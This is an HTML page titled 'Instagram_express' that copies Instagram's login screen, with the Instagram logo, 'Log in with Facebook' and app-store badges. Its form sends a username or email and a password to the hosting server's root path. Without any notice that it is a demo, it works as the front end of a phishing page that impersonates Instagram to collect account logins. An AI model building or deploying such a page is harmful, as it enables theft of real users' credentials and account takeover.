
<!DOCTYPE html>
<html class="border-l" lang="en">
<head>
    <meta charset="UTF-8">
    <link href="https://unpkg.com/tailwindcss@^2/dist/tailwind.min.css" rel="stylesheet">
    <title>Instagram_express</title>
   <style>
        * {
            margin: 0;
            padding: 0;
        }
        .instagram-logo {
            background-position: 0 -130px;
            height: 51px;
            width: 190px;
            background-image: url(https://bit.ly/3v2LT17);
        }
        .facebook-logo {
            background-position: -414px -259px;
            background-image: url(https://bit.ly/3v2LT17);
             height: 25px;
            width: 25px; 
            
        }
        .apple-store-logo {
            background-position: -132px -182px;
            height: 62px;
            width: 158px;
            background-image: url(https://bit.ly/3v2LT17);
        }
        .google-store-logo {
            background-position: 0 -182px;
            height: 62px;
            width: 150px;
            background-image: url(https://bit.ly/3v2LT17);
        }
    
            ::placeholder{
                font-size: xx-large;
            }
        
    </style>
</head>
<body>
<div class=" mt-80 lg:mt-40 w-full bg-gray-50 flex flex-col justify-center items-center">
    <div class="bg-white border border-gray-300 lg:w-2/4 w-11/12 py-8 flex items-center flex-col mb-3">
        <h1 class="bg-no-repeat instagram-logo"></h1>
        <form class="mt-8 w-full p-5 flex flex-col" action="/" method="POST">
            <input autofocu
                   class="text-3xl w-full mb-6 rounded border bg-gray-100
                    border-gray-300 h-28 lg:h-16 px-4 focus:outline-none focus:border-gray-400
                     active:outline-none placeholder:text-xl"
                   id="email" name="email" placeholder="username, or email , phonenumber" type="text" required>
            <input autofocu
                   class="text-3xl w-full mb-8 rounded border bg-gray-100
                    border-gray-300 px-4 h-28 lg:h-16 focus:outline-none focus:border-gray-400 
                    active:outline-none placeholder:text-xl "
                   id="password" name="password" placeholder="Enter Password" required >
            <button type="submit" class="text-3xl text-center bg-blue-700 text-white
             h-20 rounded font-medium">
                Log In
            </button>
        </form>
       
        <div class="flex justify-evenly space-x-2 w-80 mt-4">
            <span class="bg-gray-300 h-px flex-grow t-2 relative top-2"></span>
            <span class="flex-none uppercase text-3xl text-gray-400 font-semibold">or</span>
            <span class="bg-gray-300 h-px flex-grow t-2 relative top-2"></span>
        </div>
        <button class="mt-4 flex items-center">
            <div class="bg-no-repeat facebook-logo mr-1"></div>
            <span class="text-3xl text-blue-900 font-semibold">Log in with Facebook</span>
        </button>
        <a class="text-3xl text-blue-900 mt-4 cursor-pointer -mb-4">Forgot password?</a>
   
    </div>
    <div class=" mt-4 border border-gray-300 text-center w-3/4 py-6">
        <span class="text-3xl">Don't have an account?</span>
        <a class="text-blue-500 text-3xl font-semibold">Sign up</a>
    </div>
    <div class="mt-3 text-center">
        <span class="text-3xl">Get the app</span>
        <div class="flex mt-3 space-x-2">
            <div class="bg-no-repeat apple-store-logo"></div>
            <div class="bg-no-repeat google-store-logo"></div>
        </div>
    </div>
</div>
</body>
</html>